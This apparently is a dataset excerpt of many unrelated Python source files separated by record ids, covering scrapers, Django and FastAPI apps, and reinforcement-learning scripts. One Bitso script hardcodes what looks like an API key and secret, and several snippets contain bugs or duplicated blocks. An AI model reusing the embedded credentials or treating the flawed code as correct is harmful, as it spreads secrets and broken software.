# updating priori by loss
pri = priori
pri = Variable(pri, requires_grad=True)
loss = mig_loss_function(left_outputs.detach(),right_outputs.detach(),p)
loss.backward()
grad = pri.grad
pri = pri.detach() - Config.alpha * grad
pri = torch.exp(pri)
pri = pri / torch.sum(pri)
'''
'''
# true priori
p[0] = 0.5
p[1] = 0.5
'''
return p |
6,332 | 5a50ca64810c391231a00c6bfe5ae925ffe5ca7d | from utilidades import moeda
p = float(input('Digite o preço: R$'))
print(f'Metade de {moeda.moeda(p)} é {moeda.metade(p, show=True)}')
print(f'O dobro de {moeda.moeda(p)} é {moeda.dobro(p, show=True)}')
print(f'Aumentando 10%, temos {moeda.aumentar(p, 10, show=True)}')
print(f'Reduzindo 13%, temos {moeda.diminuir(p, 13, show=True)}') |
6,333 | 5ebc4f61810f007fd345b52531f7f4318820b9c8 | from marshmallow import fields, post_load
from rebase.common.schema import RebaseSchema, SecureNestedField
from rebase.views.bid_limit import BidLimitSchema
class TicketSetSchema(RebaseSchema):
id = fields.Integer()
bid_limits = SecureNestedField(BidLimitSchema, exclude=('ticket_set',), only=('id', 'price', 'ticket_snapshot'), many=True)
auction = SecureNestedField('AuctionSchema', only=('id',))
nominations = SecureNestedField('NominationSchema', only=('contractor', 'ticket_set', 'job_fit', 'auction', 'hide'), many=True)
@post_load
def make_ticket_set(self, data):
from rebase.models import TicketSet
return self._get_or_make_object(TicketSet, data)
serializer = TicketSetSchema()
deserializer = TicketSetSchema(strict=True)
update_deserializer = TicketSetSchema(context={'raw': True})
|
6,334 | 2f96e58a825744ae6baafd1bfb936210500f0fd0 | #!/usr/bin/env python3
from aws_cdk import core
import os
from ec2_ialb_aga_custom_r53.network_stack import NetworkingStack
from ec2_ialb_aga_custom_r53.aga_stack import AgaStack
from ec2_ialb_aga_custom_r53.alb_stack import ALBStack
from ec2_ialb_aga_custom_r53.certs_stack import CertsStack
from ec2_ialb_aga_custom_r53.ec2_stack import EC2Stack
deploy_env = core.Environment(
account=os.environ["CDK_DEFAULT_ACCOUNT"],
region=os.environ["CDK_DEFAULT_REGION"])
# These need to be injected at synth/deployment time
CIDR = os.getenv("VPC_CIDR", "")
DOMAIN = os.getenv("R53_DOMAIN", "")
SUB_DOMAIN = "code-server"
app = core.App()
net = NetworkingStack(app, "GravitonBlog-NetworkingStack", CIDR, env=deploy_env)
ec2 = EC2Stack(app, "GravitonBlog-EC2Stack", net.vpc, env=deploy_env)
ec2.add_dependency(net)
cert = CertsStack(app, "GravitonBlog-CertsStack",
DOMAIN, SUB_DOMAIN, env=deploy_env)
alb = ALBStack(app, "GravitonBlog-ALBStack", net.vpc, ec2.instance,
cert.domain_cert, env=deploy_env)
alb.add_dependency(net)
alb.add_dependency(ec2)
alb.add_dependency(cert)
aga = AgaStack(app, "GravitonBlog-AGAStack", net.vpc, alb.alb,
cert.blog_hosted_zone, SUB_DOMAIN, env=deploy_env)
aga.add_dependency(net)
aga.add_dependency(cert)
aga.add_dependency(alb)
app.synth()
|
6,335 | b6898b923e286c66673df1e07105adf789c3151c | from objet import Objet
class Piece(Objet):
""" Représente une piece qui permet d'acheter dans la boutique """
def ramasser(self, joueur):
joueur.addPiece()
def depenser(self,joueur):
joueur.depenserPiece()
def description(self):
return "Vous avez trouvé une piece, peut etre trouverez vous un marchand" |
6,336 | c70df1fab0db6f71d22a23836b11d66879879656 | from django.db import models
from django.contrib.contenttypes.models import ContentType
from widgy.generic import ProxyGenericForeignKey, ProxyGenericRelation
from django.contrib.contenttypes.generic import GenericForeignKey, GenericRelation
class Base(models.Model):
content_type = models.ForeignKey(ContentType)
content_id = models.PositiveIntegerField()
obj = ProxyGenericForeignKey('content_type', 'content_id')
class Related(models.Model):
bases = ProxyGenericRelation(Base,
content_type_field='content_type',
object_id_field='content_id')
content = models.CharField(max_length=255)
class AbstractModel(models.Model):
bases = ProxyGenericRelation(Base,
content_type_field='content_type',
object_id_field='content_id')
class Meta:
abstract = True
class ConcreteModel(AbstractModel):
pass
class Proxy(Related):
def some_method(self):
return True
class Meta:
proxy = True
|
6,337 | cba12d076ed8cba84501983fda9bdce8312f2618 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class ItemCrawlSpider(CrawlSpider):
name = 'auction_crwal'
allowed_domains = ['itempage3.auction.co.kr']
def __init__(self, keyword=None, *args, **kwargs):
super(ItemCrawlSpider, self).__init__(*args, **kwargs)
keyword.replace(' ','+')
self.start_urls = ['http://browse.auction.co.kr/search?keyword=%s&p=1' %keyword]
print(self.start_urls)
rules = (
Rule(
LinkExtractor(allow=r'DetailView\.aspx\?itemno=*'),
callback='parse_item',
follow=True),
Rule(LinkExtractor(allow=r'DetailView\.aspx\?itemno=*'))
)
def parse_item(self, response):
i = {}
i['item_img'] = list(response.xpath(
'//*[@id="content"]/div[2]/div[1]/div/div/ul/li/a/img').xpath("@src").extract())[0]
print(i['item_img'])
i['item_title'] = response.xpath(
'//*[@id="frmMain"]/h1/span/text()').extract()
i['item_price'] = response.xpath(
'//*[@id="frmMain"]/div[2]/div[1]/div/span/strong/text()').extract()
return i
|
6,338 | b36f3ffed888edaa7716f712f1549dc205799caf | # Generated by Django 3.0.5 on 2020-04-25 15:35
from django.db import migrations, models
import lots.models
class Migration(migrations.Migration):
dependencies = [
('lots', '0012_auto_20200425_1720'),
]
operations = [
migrations.AlterField(
model_name='lots',
name='photo',
field=models.ImageField(default='images/default.png', upload_to=lots.models.path_and_rename),
),
]
|
6,339 | 03147de944c4f75417006a5087e75354dba644ec | import sys
sys.path.append("..")
from packages import bitso as BS
from packages import account as ACCOUNT
from packages import currency_pair as CP
account=ACCOUNT.Account('577e4a03-540f9610-f686d434-qz5c4v5b6n','dd7b02f5-c286e9d4-f2cc78c3-bfab3')
bs=BS.Bitso(account)
currency_pair=CP.CurrencyPair('btc','xmn')
depth=bs.depth(currency_pair)
a=1
|
6,340 | 49b295c3e323695779eb32181193ef88b678b34d | from fastapi import APIRouter, Depends
from fastapi.responses import RedirectResponse
import app.setting as setting
from app.dependencies import get_project_by_prefix
from app.entities.project import Project
router = APIRouter(
prefix="/go",
)
@router.get("/{prefix_id}")
def redirect_to_board(project: Project = Depends(get_project_by_prefix)):
return RedirectResponse(url=project.notion_board_url)
@router.get("/{prefix_id}/{ticket_id}")
def redirect_to_ticket(
ticket_id: str, project: Project = Depends(get_project_by_prefix)
):
ticket = project.query_ticket(ticket_id=ticket_id)
notion_url = setting.notion_base_url + ticket.id.replace("-", "")
return RedirectResponse(url=notion_url)
|
6,341 | c025fccad9d37dff4db3a10455cbe7d92917d8f6 | #!/usr/bin/env python
__author__ = 'greghines'
import numpy as np
import matplotlib.pyplot as plt
import csv
import sys
import os
import pymongo
import matplotlib.cbook as cbook
import cPickle as pickle
sys.path.append("/home/greg/github/pyIBCC/python")
import ibcc
client = pymongo.MongoClient()
db = client['condor_2014-09-14']
collection = db["condor_classifications"]
collection2 = db["condor_subjects"]
subjects = []
users = []
classifications = []
with open("/home/greg/Databases/condor_ibcc.py","wb") as f:
f.write("import numpy as np\n")
f.write("scores = np.array([0,1])\n")
f.write("nScores = len(scores)\n")
f.write("nClasses = 2\n")
f.write("inputFile = \"/home/greg/Databases/condor_ibcc.csv\"\n")
f.write("outputFile = \"/home/greg/Databases/condor_ibcc.out\"\n")
f.write("confMatFile = \"/home/greg/Databases/condor_ibcc.mat\"\n")
f.write("nu0 = np.array([30,70])\n")
f.write("alpha0 = np.array([[3, 1], [1,3]])\n")
import datetime
i = 0
errorCount = 0
for r in collection.find({"$and": [{"tutorial": False},{"subjects" : {"$elemMatch" : {"zooniverse_id" : {"$exists" : True}}}}]}):
try:
user_name = r["user_name"]
except KeyError:
continue
subject_id = r["subjects"][0]["zooniverse_id"]
if not(user_name in users):
users.append(user_name)
if not(subject_id in subjects):
subjects.append(subject_id)
user_index = users.index(user_name)
subject_index = subjects.index(subject_id)
if ("marks" in r["annotations"][-1]):
blank = 1
for markings in r["annotations"][-1]["marks"].values():
try:
if markings["animal"] in ["condor","raven","goldenEagle","coyote","turkeyVulture"]:
blank = 0
break
elif markings["animal"] in ["carcassOrScale"]:
continue
else:
errorCount += 1
except KeyError:
errorCount += 1
else:
blank = 1
i += 1
#if i == 1000:
# break
if (i % 5000) == 0:
print i
classifications.append((user_index,subject_index,blank))
print "====----"
print errorCount
try:
os.remove("/home/greg/Databases/condor_ibcc.out")
except OSError:
pass
try:
os.remove("/home/greg/Databases/condor_ibcc.mat")
except OSError:
pass
try:
os.remove("/home/greg/Databases/condor_ibcc.csv.dat")
except OSError:
pass
with open("/home/greg/Databases/condor_ibcc.csv","wb") as f:
f.write("a,b,c\n")
for u, s, b in classifications:
f.write(str(u)+","+str(s)+","+str(b)+"\n")
print datetime.datetime.time(datetime.datetime.now())
ibcc.runIbcc("/home/greg/Databases/condor_ibcc.py")
print datetime.datetime.time(datetime.datetime.now())
pickle.dump(subjects,open("/home/greg/Databases/condor_ibcc.pickle","wb")) |
6,342 | 2b23237e697cb4ca8f1013d7be343c70fba9541d | import random
class Madlib:
'''
This class generates the madlib from word lists.
'''
def get_madlib(self):
madlib = """
Once there was a {0}. It {1} at the {2}.
Then because of its {3} it {4}. Wow! You sure are {5}!
Thanks! I {6} you very much.
"""
nouns = ['cheesecakes', 'bicycle', 'park', 'computer']
verbs = ['watched tv', 'voted', 'fell over']
adjectives = ['smelly', 'slimy', 'soft', 'loud']
output = madlib.format(
random.choice(nouns),
random.choice(verbs),
random.choice(nouns),
random.choice(nouns),
random.choice(verbs),
random.choice(adjectives),
random.choice(adjectives)
)
return output
|
6,343 | d6fa3039c0987bf556c5bd78b66eb43543fd00fe | from fastapi import FastAPI
from pydantic import BaseModel
from typing import List, Optional
from joblib import load
app = FastAPI()
clf = load("model.joblib")
class PredictionRequest(BaseModel):
feature_vector: List[float]
score: Optional[bool] = False
@app.post("/prediction")
def predict(req: PredictionRequest):
prediction = clf.predict([req.feature_vector])
response = {"is_inlier": int(prediction[0])}
score = clf.score_samples([req.feature_vector])
response["anomaly_score"] = score[0]
return response
@app.get("/model_infomation")
def model_infomation():
return clf.get_params()
if __name__ == "__main__":
print("Running")
|
6,344 | 1af73c0ca38ea32119f622dc14741c0bb0aa08fd | # 001. 웹 서버에 요청하고 응답받기
# 학습 내용 : 웹 서버에 접속하여 웹 페이지 정보를 요청하고 서버로부터 응답 객체를 받는 과정을 이해한다.
# 힌트 내용 : requests 모듈의 get() 함수에 접속하려는 웹 페이지의 주소(URL)를 입력한다.
import requests
url = "https://www.python.org/"
resp = requests.get(url)
print(resp) # 200, 정상 동작
url2 = "https://www.python.org/1"
resp2 = requests.get(url2)
print(resp2) # 404 error, 해당 페이지를 찾을 수 없음 |
6,345 | 991c361043eb1539a80b5e8e1db44bc365e7e639 | #!/usr/bin/env/ python
# -*- coding:utf-8 -*-
# Created by: Vanish
# Created on: 2019/9/25
import numpy as np
from scipy import optimize
def sigmoid(z):
return 1 / (1 + np.exp(-z))
def costReg(theta, X, y, lamda):
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
first = np.multiply(-y, np.log(sigmoid(X * theta.T)))
second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))
reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))
return np.sum(first - second) / len(X) + reg
def gradientReg(theta, X, y, lamda):
theta = np.matrix(theta)
X = np.matrix(X)
y = np.matrix(y)
parameters = int(theta.ravel().shape[1])
grad = np.zeros(parameters)
error = sigmoid(X * theta.T) - y
for i in range(parameters):
term = np.multiply(error, X[:, i])
if (i == 0):
grad[i] = np.sum(term) / len(X)
else:
grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])
return grad
def predict(theta, X):
probability = sigmoid(X * theta.T)
return [1 if x >= 0.5 else 0 for x in probability]
def implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):
n = X_train.shape[1]
# convert to numpy arrays and initalize the parameter array theta
X_train = np.array(X_train.values)
y_train = np.array(y_train.values)
theta = np.zeros(n)
result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))
theta_min = np.matrix(result[0])
predictions = predict(theta_min, X_test)
correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]
accuracy = (sum(map(int, correct)) % len(correct))
print('accuracy = {0}%'.format(accuracy)) |
6,346 | 25434fccff4401df2cebc9b0c4d0231f056b4e81 | def sumIntervals(input):
interval = set()
if len(input) > 0:
for data in input:
if len(data) == 2 and data[0] < data[1]:
for i in range(data[0], data[1]):
interval.add(i)
else:
return 1
return len(interval)
else:
return 0
sumIntervals([[1,2], [6, 10], [11, 15]])
|
6,347 | a699b43c57c315967a6d1881d7012fee4a93607b | N = int(input())
l = []
for n in range(N):
x = int(input())
l.append(x)
l.sort()
print(*l, sep='\n') |
6,348 | 618a8430d50aeca1c4b9c3fba975be342cc1893f | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Title: Counting summations
import math
limit = 201
comboList = dict()
alphabet = range(1, limit)
searchAlphabet = set(alphabet)
def concat(a, b):
return "%i %i" % (a, b)
def split(n, min=1, tab=6):
if concat(n,min) in comboList.keys():
if tab == 6:
print " %sn = %i, min = %i, %i" % (" "*tab, n, min, concat(n, min))
return comboList[concat(n,min)]
if int(n) < int(min + 1):
return 1
splitSum = 0
splitList = []
for i in range(len(alphabet)):
if alphabet[i] > n/2:
break
if (n - alphabet[i]) in alphabet and not alphabet[i] < min:
splitSum += split(n - alphabet[i], alphabet[i], tab - 1)
comboList[concat(n,min)] = splitSum + 1
return splitSum + 1
#print split(99) -1
#print split(100) -1
splits = []
for i in range(limit):
splits.append(split(i) - 1)
print "%i: %i" % (i, splits[i])
|
6,349 | fabd3f233753f63d731a43c8b8b311e50d9deefe | # 217 is a prime number. In order 2017 to be a divisor of for sigma(a)=Product((p**(n+1)-1) // (p-1) for all divisors) it must be a power of a prime with (p**(a+1)-1) // (p-1) % 2017 == 0
# so we need only to check all such primes 'p' and count all k*p for k=1..N//p. We check p^n with n>=2 by brute force all primes. For n = 1 we generate all candidates by the formula p = k*2017-1 and check if it's a prime in a effective way.
# we also take care of duplicates when p'=k*p is not a qualified number if k is a qualified number itself.
from tools import *
from math import ceil
def sig(f):
P = 1
for p,a in f:
P *= (p**(a+1)-1) // (p-1)
return P
err = 1e-10
def calc(N, D):
def check(n):
return not sig(factor(n)) % D
cachePrimes(int(N**.5))
def a2n(a):
return (a + 1) // D
from math import log
def genPrimeSigDivs(minA, maxA): # generate all primes and primes**k with sig % 2017 == 0
if minA > maxA:
return None
maxE = int(ceil(log(maxA)/log(2)))
for e in range(2, maxE): # for power >= 2 check all primes
for p in primesN2M(ceil(minA**(1/e)-err), int(maxA**(1/e)+err)):
if ((p**(e+1)-1) // (p-1)) % D == 0:
yield p, e
for n in range(ceil((minA + 1)/D-err), (maxA+1)//D+1): # for power==1 check all 2017*k-1 for primality
p = n * D - 1
if isPrimeMillerRabin(p, 5):
yield p, 1
def excl(p, e, N=N):
a = p**e
mem = set(range(0, N+1, a*p))
for p2, e2 in genPrimeSigDivs(a+1, N//a):
ex2 = excl(p2, e2, N//a)
for a2 in range(0, N+1, a*p2**e2):
k2 = a2//a
if check(k2) and not k2 in ex2 and not a2 in mem:
mem.add(a2)
return mem
elapsed()
resetTime()
res = 0
for p, e in genPrimeSigDivs(D-1, N): # walk though all qualified primes**e
a = p**e
k = N // a
res += a*k*(k + 1) // 2 # sum of all qualified numbers
res -= sum(excl(p, e))
if a % 10000 == 1:
elapsed((a, 1, N))
return res
print(calc(10**11, 2017))
elapsed()
|
6,350 | 11337f6f9cf22ba6fbed68dfcb7a07fb6368e94e | # -*- coding: utf-8 -*-
from django.db import models
from backend.models.account import Account
from string import Template
out = Template("$account: $parts")
class Group(models.Model):
name = models.CharField(max_length=100)
class GroupParticipation(models.Model):
account = models.ForeignKey(Account, related_name='groups')
parts = models.FloatField(default=1.0)
group = models.ForeignKey(Group, related_name='participants')
def __str__(self):
return out.substitute(account=self.account, parts=self.parts)
class Meta:
unique_together = ('account', 'parts', 'group')
|
6,351 | 221b6ad6035276fb59addc4065c4ccee3f5a2d84 | from random import choice, random
from tabulate import tabulate
from Constants import *
from time import sleep
import numpy as np
import os
class QLearn():
def __init__(self, alfa, gama, epsilon, epsilonDecay, epsilonMin, rewards, environment):
self.alfa = alfa
self.gama = gama
self.epsilon = epsilon
self.epsilonDecay = epsilonDecay
self.epsilonMin = epsilonMin
self.rewards = rewards
self.environment = environment
self.previousState = {}
self.State = {}
def initializeStates(self):
for row in range(10):
for column in range(10):
for direction in Directions:
self.previousState[f"{row}{column}{direction.value}"] = 0
self.State[f"{row}{column}{direction.value}"] = 0
def checkBoundaries(self, state, action):
row, column = int(state[0]) , int(state[1])
if action == Directions.UP: return f"{max(row - 1, 0)}{column}", self.environment[max(row - 1,0)][column]
elif action == Directions.RIGHT: return f"{row}{min(column + 1, 9)}", self.environment[row][min(column + 1, 9)]
elif action == Directions.DOWN: return f"{min(row + 1, 9)}{column}", self.environment[min(row + 1, 9)][column]
elif action == Directions.LEFT: return f"{row}{max(column - 1, 0)}", self.environment[row][max(column - 1, 0)]
def reward(self, state, action):
futurePos, symbol = self.checkBoundaries(state, action)
return self.rewards[c] if futurePos == state else self.rewards[symbol]
def Q(self, state, action):
futurePos, symbol = self.checkBoundaries(state, action)
val = []
if symbol in [c, p, t]:
val.append(self.rewards[symbol])
else:
for direction in Directions:
val.append(self.previousState[f"{futurePos}{direction.value}"])
return self.previousState[f"{state}{action.value}"] + self.alfa * (self.reward(state, action) + self.gama * np.max(val) - self.previousState[f"{state}{action.value}"])
def getInitialPosition(self):
pos = []
for row in range(10):
for column in range(10):
if self.environment[row][column] == b:
pos.append((row,column))
return choice(pos)
def train(self, maxGen):
self.initializeStates()
for generation in range(maxGen):
if generation % 100 == 0: print(f"Geração {generation}/{maxGen}")
initialPosAgent = self.getInitialPosition()
state = f"{initialPosAgent[0]}{initialPosAgent[1]}"
for o_0 in range(200):
self.State[f"{state}{Directions.UP.value}"] = self.Q(state, Directions.UP)
self.State[f"{state}{Directions.RIGHT.value}"] = self.Q(state, Directions.RIGHT)
self.State[f"{state}{Directions.DOWN.value}"] = self.Q(state, Directions.DOWN)
self.State[f"{state}{Directions.LEFT.value}"] = self.Q(state, Directions.LEFT)
possibleActions = [
self.State[f"{state}{Directions.UP.value}"],
self.State[f"{state}{Directions.RIGHT.value}"],
self.State[f"{state}{Directions.DOWN.value}"],
self.State[f"{state}{Directions.LEFT.value}"]
]
action = choice(list(Directions)) if random() < self.epsilon else Directions(np.argmax(possibleActions))
state, o_0 = self.checkBoundaries(state, action)
self.previousState = self.State.copy()
self.epsilon *= self.epsilonDecay
self.epsilon = max(self.epsilon, self.epsilonMin)
print(f"Geração {maxGen}/{maxGen}")
def exec(self, row , column):
state = f"{row}{column}"
self.draw((row,column))
while (self.environment[row][column] != t):
possibleActions = [
self.State[f"{state}{Directions.UP.value}"],
self.State[f"{state}{Directions.RIGHT.value}"],
self.State[f"{state}{Directions.DOWN.value}"],
self.State[f"{state}{Directions.LEFT.value}"]
]
action = Directions(np.argmax(possibleActions))
print(f"Direction: {symbolToUnicode[action.value]}")
state, o_0 = self.checkBoundaries(state, action)
row, column = int(state[0]), int(state[1])
self.draw((row,column))
def draw(self, carPosition):
sleep(0.4)
os.system('cls' if os.name=='nt' else 'clear')
table = []
for row in range(10):
col = []
for column in range(10):
if (row, column) == carPosition:
col.append("🛺")
else:
col.append(symbolToUnicode[self.environment[row][column]])
table.append(col)
print(tabulate(table, [], tablefmt="fancy_grid"))
|
6,352 | df25b51010fdbcbf1a8949a7a755a3a982bbf648 | from django.db import models
from .data import REGISTER_TYPE_CHOICES
from .data import ENTRANCE_TYPE
from .data import EXPENSE_TYPE
class EstheticHouse(models.Model):
name = models.CharField(
verbose_name='nombre',
max_length=512,
unique=True,
)
def __str__(self):
return self.name
class Meta:
ordering = ['name',]
verbose_name = 'Casa Estética'
verbose_name_plural = 'Casas Estéticas'
class Client(models.Model):
name = models.CharField(
max_length=255,
verbose_name='nombre',
)
document = models.CharField(
primary_key=True,
max_length=30,
verbose_name='cédula',
)
phone_number = models.CharField(
max_length=10,
verbose_name='celular'
)
email = models.CharField(
max_length=255,
verbose_name='correo electrónico',
null=True,
)
birthday = models.DateField(
verbose_name='Fecha de Cumpleaños',
null=True,
)
def __str__(self):
return self.name
class Meta:
ordering = ['name',]
verbose_name = 'Cliente'
verbose_name_plural = 'Clientes'
class Product(models.Model):
code = models.CharField(
primary_key=True,
verbose_name='código',
max_length=255,
unique=True,
)
house = models.ForeignKey(
'EstheticHouse',
verbose_name='casa estética',
null=True,
)
name = models.CharField(
max_length=255,
verbose_name='nombre',
blank=True,
)
price = models.IntegerField(
verbose_name='precio',
)
amount = models.IntegerField(
verbose_name='cantidad',
)
@property
def is_sold_out(self):
return self.amount == 0
def __str__(self):
return self.name
class Meta:
ordering = ['name',]
verbose_name = 'Producto'
verbose_name_plural = 'Productos'
class Employee(models.Model):
name = models.CharField(
verbose_name='nombre',
max_length=255,
)
document = models.CharField(
primary_key=True,
max_length=30,
verbose_name='cédula',
)
phone_number = models.CharField(
max_length=10,
verbose_name='celular',
null=True,
blank=True,
)
def __str__(self):
return self.name
class Meta:
ordering = ['name',]
verbose_name = 'Empleado'
verbose_name_plural = 'Empleados'
class Register(models.Model):
owner = models.ForeignKey(
'Employee',
verbose_name='propietario'
)
client = models.ForeignKey(
'Client',
verbose_name='cliente',
null=True,
)
description = models.CharField(
max_length=255,
null=True,
blank=True,
verbose_name='descripción'
)
date = models.DateTimeField(
auto_now_add=True,
verbose_name='fecha',
)
value = models.IntegerField(
verbose_name='valor',
)
register_type = models.PositiveSmallIntegerField(
choices=REGISTER_TYPE_CHOICES,
verbose_name='servicio',
)
is_pay_with_card = models.BooleanField(
default=False,
verbose_name='Fue pago con tarjeta de credito'
)
product_name = models.CharField(
max_length=255,
verbose_name='nombre del producto'
)
@property
def is_entrance(self):
return self.register_type == ENTRANCE_TYPE
@property
def is_expense(self):
return self.register_type == EXPENSE_TYPE
def __str__(self):
return 'Registro número {}'.format(
self.id
)
class Meta:
ordering = ['date',]
verbose_name = 'Registro'
verbose_name_plural = 'Registros'
|
6,353 | 107b09696ac671e689235da55aaf4c26ae7c321c | import scraperwiki
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines van denieuwereporter-alle h1 koppen
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
#print lxml.html.tostring(h1)
print h1.text_content()
record = {'h1': h1.text_content()}
scraperwiki.sqlite.save(["h1"], record)
import scraperwiki
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines van denieuwereporter-alle h1 koppen
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
#print lxml.html.tostring(h1)
print h1.text_content()
record = {'h1': h1.text_content()}
scraperwiki.sqlite.save(["h1"], record)
import scraperwiki
html = scraperwiki.scrape('http://www.denieuwereporter.nl/')
# scrape headlines van denieuwereporter-alle h1 koppen
import lxml.html
root = lxml.html.fromstring(html)
tds = root.cssselect('h1')
for h1 in tds:
#print lxml.html.tostring(h1)
print h1.text_content()
record = {'h1': h1.text_content()}
scraperwiki.sqlite.save(["h1"], record)
|
6,354 | fe1cc7660396071172c1ec65ba685e677e497646 | # TODO - let user input file name on command line
level_file = 'level.txt'
# read characters in level.txt into
# terrain map
# which is array of columns
f = open(level_file)
terrain_map = []
for row in f:
col_index = 0
row_index = 0
for tile in row.rstrip():
if col_index == len(terrain_map):
terrain_map.append([])
terrain_map[col_index].append(tile)
col_index += 1
row_index += 1
f.close()
# print(terrain_map)
def map_tile_char_to_terrain(tile):
if tile == 'M':
return "dirt"
if tile == 'R':
return "rock"
if tile == 'D':
return "data"
if tile == 'B':
return "empty"
if tile == "P":
return "solar"
return "dirt"
def output_terrain_column(column):
n = len(column)
print('[')
for i, tile in enumerate(column):
print(' {')
print(' "tex": "' + map_tile_char_to_terrain(tile) + '"')
if i + 1 < n:
print(' },')
else:
print(' }')
print(']')
def print_entities():
print """\
"entities": [
{
"x": 0,
"y": 0,
"rot": 0,
"tex": "rover",
"name": "rover",
"inherits": {
"Accessible": [
"Bots"
],
"Rover": {
"moveSFX": "move"
}
}
}
],
"""
def print_footer():
# TODO add other textures
print """
"tex": {
"rover": "/images/rover.png",
"dirt": "/images/mars.png",
"rock": "/images/mars_rock.png",
"blank": "/images/blank.png",
"solar": "/images/panel.png",
"data": "/images/data_drive.png"
},
"sfx": {
"botMove": "/audio/"
},
"meta": {
"title": "Getting started",
"desc": "Learn the basics of javascript and how to control a bot"
}
"""
# output terrain map by columns
print("{")
print(' "tests": [')
print(' {')
print_entities()
print(' "terrain": [')
num_cols = len(terrain_map)
for i, column in enumerate(terrain_map):
output_terrain_column(column)
if i + 1 < num_cols:
print(',')
print(' ]')
print(' }')
print(' ]')
print(',')
print_footer()
print("}") |
6,355 | c1335a8128ad4ba6ce6942e80f3c8b68a4210902 | def chessKnight(cell):
pivot = "abcdefgh"
count = 8
for i in range(len(pivot)):
if cell[0] == pivot[i]:
vertical_4 , vertical_2 = False , False
if int(cell[1]) == 8 or int(cell[1]) == 1:
vertical_4 = True
count -= 4
elif int(cell[1]) == 7 or int(cell[1]) == 2:
vertical_2 = True
count -= 2
if i == 0 or i == 7:
if vertical_4:
count -= 2
elif vertical_2:
count -= 3
else:
count -= 4
elif i == 1 or i == 6:
if vertical_4:
count -= 1
else:
count -= 2
return count
|
6,356 | 63ee25791177ead5389c14990ce6da3e2c11b683 | import gym
import os
import sys
import numpy as np
import theano
import theano.tensor as T
import matplotlib.pyplot as plt
from gym import wrappers
from datetime import datetime
from mountain_car_v1_q_learning import Transformer
# so you can test different architectures
class Layer:
def __init__(self, m1, m2, f=T.nnet.relu, use_bias=True, zeros=False):
if zeros:
w = np.zeros((m1, m2))
else:
w = np.random.randn(m1, m2) * np.sqrt(2 / m1)
self.w = theano.shared(w)
self.params = [self.w]
self.use_bias = use_bias
if use_bias:
self.b = theano.shared(np.zeros(m2))
self.params += [self.b]
self.f = f
def forward(self, x):
if self.use_bias:
a = x.dot(self.w) + self.b
else:
a = x.dot(self.w)
return self.f(a)
# approximates pi(a | s)
class Policy:
def __init__(self, ft, D, layer_sizes_mean=[], layer_sizes_var=[]):
# save inputs for copy
self.ft = ft
self.D = D
self.layer_sizes_mean = layer_sizes_mean
self.layer_sizes_var = layer_sizes_var
##### model the mean #####
self.mean_layers = []
m1 = D
for m2 in layer_sizes_mean:
layer = Layer(m1, m2)
self.mean_layers.append(layer)
m1 = m2
# final layer
layer = Layer(m1, 1, lambda x: x, use_bias=False, zeros=True)
self.mean_layers.append(layer)
##### model the variance #####
self.var_layers = []
M1 = D
for M2 in layer_sizes_var:
layer = Layer(m1, m2)
self.var_layers.append(layer)
m1 = m2
# final layer
layer = Layer(m1, 1, T.nnet.softplus, use_bias=False, zeros=False)
self.var_layers.append(layer)
# get all params for gradient
params = []
for layer in (self.mean_layers + self.var_layers):
params += layer.params
self.params = params
# inputs and targets
x = T.matrix('x')
actions = T.vector('actions')
advantages = T.vector('advantages')
# calculate output and cost
def get_output(layers):
z = x
for layer in layers:
z = layer.forward(z)
return z.flatten()
mean = get_output(self.mean_layers)
var = get_output(self.var_layers) + 1e-4 # smoothing
self.predict_ = theano.function(
inputs=[x],
outputs=[mean, var],
allow_input_downcast=True
)
def predict(self, x):
x = np.atleast_2d(x)
x = self.ft.transform(x)
return self.predict_(x)
def sample_action(self, x):
pred = self.predict(x)
mu = pred[0][0]
v = pred[1][0]
a = np.random.randn()*np.sqrt(v) + mu
return min(max(a, -1), 1)
def copy(self):
clone = Policy(self.ft, self.D, self.layer_sizes_mean, self.layer_sizes_mean)
clone.copy_from(self)
return clone
def copy_from(self, other):
# self is being copied from other
for p, q in zip(self.params, other.params):
v = q.get_value()
p.set_value(v)
def perturb_params(self):
for p in self.params:
v = p.get_value()
noise = np.random.randn(*v.shape) / np.sqrt(v.shape[0]) * 5.0
if np.random.random() < 0.1:
# with probability 0.1 start completely from scratch
p.set_value(noise)
else:
p.set_value(v + noise)
def episode(env, policy, gamma):
observation = env.reset()
done = False
total_reward = 0
iterations = 0
while not done and iterations < 2000:
# if we reach 2000, just quit, don't want this going forever
# the 200 limit seems a bit early
action = policy.sample_action(observation)
# oddly, the mountain car environment requires the action to be in
# an object where the actual action is stored in object[0]
observation, reward, done, info = env.step([action])
total_reward += reward
iterations += 1
return total_reward
def series(env, T, policy, gamma, print_iters=False):
total_rewards = np.empty(T)
for i in range(T):
total_rewards[i] = episode(env, policy, gamma)
if print_iters:
print(i, "Average so far:", total_rewards[:(i+1)].mean())
avg_totalrewards = total_rewards.mean()
print("Average total rewards:", avg_totalrewards)
return avg_totalrewards
def random_search(env, policy, gamma):
total_rewards = []
best_avg_totalreward = float('-inf')
best_policy = policy
num_episodes_per_param_test = 3
for t in range(100):
tmp_model = best_policy.copy()
tmp_model.perturb_params()
avg_totalrewards = series(
env,
num_episodes_per_param_test,
tmp_model,
gamma
)
total_rewards.append(avg_totalrewards)
if avg_totalrewards > best_avg_totalreward:
best_policy = tmp_model
best_avg_totalreward = avg_totalrewards
return total_rewards, best_policy
def main():
env = gym.make('MountainCarContinuous-v0')
ft = Transformer(env, n_components=100)
D = ft.dimensions
model = Policy(ft, D, [], [])
gamma = 0.99
if 'monitor' in sys.argv:
filename = os.path.basename(__file__).split('.')[0]
